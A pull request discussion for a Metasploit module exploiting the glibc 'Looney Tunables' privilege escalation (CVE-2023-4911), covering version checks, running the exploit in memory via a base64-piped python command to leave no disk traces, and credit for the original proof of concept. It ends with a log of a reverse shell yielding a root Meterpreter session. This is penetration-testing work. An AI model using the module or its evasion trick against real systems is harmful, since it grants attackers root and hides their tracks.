Glibc Tunables Privilege Escalation CVE-2023-4911 (Looney Tunables)

[jheysel-r7]

The PR adds an exploit for the "Looney Tunables" Linux LPE. It checks to make sure the version of glibc running on the target is vulnerable and once verified it drops a python script that exploits the vulnerability and returns a session running in the context of the root user.

[cdelafuente-r7]

Thanks for this great module @jheysel-r7 ! I left a few comments for you to review when you get a chance. I tested against a fresh install of Ubuntu 22.04.2 and it works great!

[jvoisin]

Do you have some documentation on how to generate those magic values?

[jheysel-r7]

I've added a comment referencing the original PoC which can find these offsets.

[jvoisin]

There is the handy between method, that one can use like this: Rex::Version.new(glibc_version).between?(Rex::Version.new('1.2'), Rex::Version.new('1.9'))

[jvoisin]

Would something like cmd_exec("echo #{Rex::Text.encode_base64(exploit_data)}|base64 -d|#{python_binary} -c") work? It would avoid writing the exploit to disk.

[jheysel-r7]

Love that idea @jvoisin, got the payload running without being written to disk 👌

[jvoisin]

CC @blasty

[blasty]

@jvoisin pong. anything in particular I should comment on?

@jheysel-r7 emailed me a while back asking me to add a MIT license blurb to gnu-acme.py so it could be incorporated into MSF. Sorry for not getting back to you, Jack; I'm bad at this whole E-mail thing. :-(

I won't be adding any conventional LICENSE blurbs to any of my public exploit code. It looks like @jheysel-r7 managed to work around this requirement by loosely rewriting my code though?

[jheysel-r7]

@jvoisin pong. anything in particular I should comment on?

@jheysel-r7 emailed me a while back asking me to add a MIT license blurb to gnu-acme.py so it could be incorporated into MSF. Sorry for not getting back to you, Jack; I'm bad at this whole E-mail thing. :-(

I won't be adding any conventional LICENSE blurbs to any of my public exploit code. It looks like @jheysel-r7 managed to work around this requirement by loosely rewriting my code though?

No worries about the email @blasty! I'm not great with the email thing either especially if I don't know the person. Also no worries about the license blurb, I'm not a lawyer however the loose rewriting was an attempt to get around that issue. I've credited you as an author of the module, let me know if you have any questions or issues with any of this.

[blasty]

No worries about the email @blasty! I'm not great with the email thing either especially if I don't know the person. Also no worries about the license blurb, I'm not a lawyer however the loose rewriting was an attempt to get around that issue. I've credited you as an author of the module, let me know if you have any questions or issues with any of this.

No issues from my side. If you could change my attribution line from blasty to blasty <peter@haxx.in> I would appreciate it. That's all.

[jvoisin]

Nope, nothing in particular, I just wanted to:

1. let you know that metasploit might soon have one of your exploits in it
2. give you a headsup to take a look at it if you wanted to help with the effort, or generally look at the code

[jheysel-r7]

Thanks all for the detailed review. I've pushed some changes and retested both targets listed in the documentation's scenarios section.

[jheysel-r7]

I've added a comment referencing the original PoC which can find these offsets.

[jheysel-r7]

Love that idea @jvoisin, got the payload running without being written to disk 👌

[jvoisin]

You might want to use a search'n'replace with a placeholder in the .py file for those, to avoid duplicating the information.

[jheysel-r7]

Good call

[jvoisin]

Now that the payload is passed to python directly, there are no traces on disk, are they?

[jheysel-r7]

I don't think so, I've removed this now.

[jvoisin]

Suggested change

	if command_exists?('file ')
	if !command_exists?('file ')
	print_warning('Unable to verify the BuildID for ld.so by using `file`, the exploit has a chance of being incompatible with this target.')
	end

No need to fail should file not exist.

[jheysel-r7]

I've left this suggestion out. If file does not exist we print the warning message in the else block and skip everything inside the if as it's all dependant on file being present.

[jvoisin]

Why wrap the command in $(…)? cmd_exec alone should be working, no?

[jheysel-r7]

Yup my mistake, that was unnecessarily copy and pasted over from testing.

[jheysel-r7]

Thanks for all the comments @jvoisin, much appreciated!

[jheysel-r7]

Yup my mistake, that was unnecessarily copy and pasted over from testing.

[jheysel-r7]

I've left this suggestion out. If file does not exist we print the warning message in the else block and skip everything inside the if as it's all dependant on file being present.

[jheysel-r7]

I don't think so, I've removed this now.

[jheysel-r7]

Good call

[jvoisin]

Any reasons for wrapping this in parenthesis?

[cdelafuente-r7]

Thanks for updating this @jheysel-r7 ! Everything looks good to me now. I tested against fresh install of Ubuntu 22.04.2 and verified I got a session as root. I'll go ahead and land it.

• Example output:

msf6 exploit(linux/local/glibc_tunables_priv_esc) > run verbose=true session=1

[*] Started reverse TCP handler on 192.168.100.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The glibc version (2.35-0ubuntu3.1) found on the target appears to be vulnerable
[*] Using 'python3' to run the exploit
[+] The Build ID for ld.so: 61ef896a699bb1c2e4e231642b2e1688b2f1a61e is in the list of supported Build IDs for the exploit.
[+] The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.100.112
[*] Meterpreter session 2 opened (192.168.100.122:4444 -> 192.168.100.112:34790) at 2023-12-20 13:25:30 -0500

meterpreter > getuid 
Server username: root
meterpreter > sysinfo 
Computer     : 192.168.100.112
OS           : Ubuntu 22.04 (Linux 5.19.0-35-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

[cdelafuente-r7]

Release Notes

This adds an exploit module for the "Looney Tunables" Linux LPE, identified as CVE-2023-4911. It checks the version of glibc running on the target to make sure it is vulnerable and, once verified, it drops a python script that exploits the vulnerability and returns a session running in the context of the root user.